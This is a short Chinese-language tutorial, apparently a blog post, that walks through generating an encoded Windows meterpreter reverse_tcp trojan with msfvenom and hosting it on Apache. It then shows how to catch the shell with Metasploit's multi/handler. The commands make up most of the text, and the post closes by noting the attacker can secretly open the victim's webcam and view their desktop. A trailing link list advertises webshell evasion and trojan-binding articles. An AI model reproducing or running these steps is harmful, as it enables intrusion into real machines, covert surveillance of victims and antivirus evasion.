基于Metasploit利于msfvenom生成恶意软件获取shell

简介: 基于Metasploit利于msfvenom生成恶意软件获取shell

生成恶意软件:


msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.88.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/Myon.exe

启用阿帕奇:

systemctl start apache2

下载生成的木马

打开漏洞检测工具

msfdb run


加载攻击模块,查看参数设置

use exploit/multi/handler

show options

设置攻击载荷和监听IP,开始监听

set lhost 192.168...

set payload windows/meterpreter/reverse_tcp

run(或者用exploit)

运行木马,成功建立连接

拿到用户权限后

我们可以进行很多操作,比如强行打开目标机摄像头,直接获取目标机的桌面情况等

目录
相关文章
|
7月前
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
74 0
|
安全 Shell Python
记一次PowerShell配合Metersploit的艰难提权
记一次PowerShell配合Metersploit的艰难提权
139 0
|
7月前
|
供应链 JavaScript Shell
供应链投毒预警 | 恶意NPM包利用Windows反向shell后门攻击开发者
本周(2024年02月19号),悬镜供应链安全情报中心在NPM官方仓库(https://npmjs.com)中发现多起NPM组件包投毒事件。攻击者利用包名错误拼写方式 (typo-squatting)在NPM仓库中连续发布9个不同版本的恶意包,试图通过仿冒合法组件(ts-patch-mongoose)来攻击潜在的NodeJS开发者。
140 2
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
650 0
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
233 0
|
安全 Shell 网络安全
渗透测试-模拟黑客给软件加上后门获取shell
渗透测试-模拟黑客给软件加上后门获取shell
渗透测试-模拟黑客给软件加上后门获取shell
|
安全 网络协议 Shell
2022渗透测试-反弹shell的详细讲解
2022渗透测试-反弹shell的详细讲解
2022渗透测试-反弹shell的详细讲解
|
开发框架 运维 安全
渗透测试中说的Shell和Webshll到底是什么?
渗透测试中说的Shell和Webshll到底是什么?
345 0
渗透测试中说的Shell和Webshll到底是什么?
|
安全 Linux 测试技术
Metasploit 实现木马生成、捆绑及免杀
在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。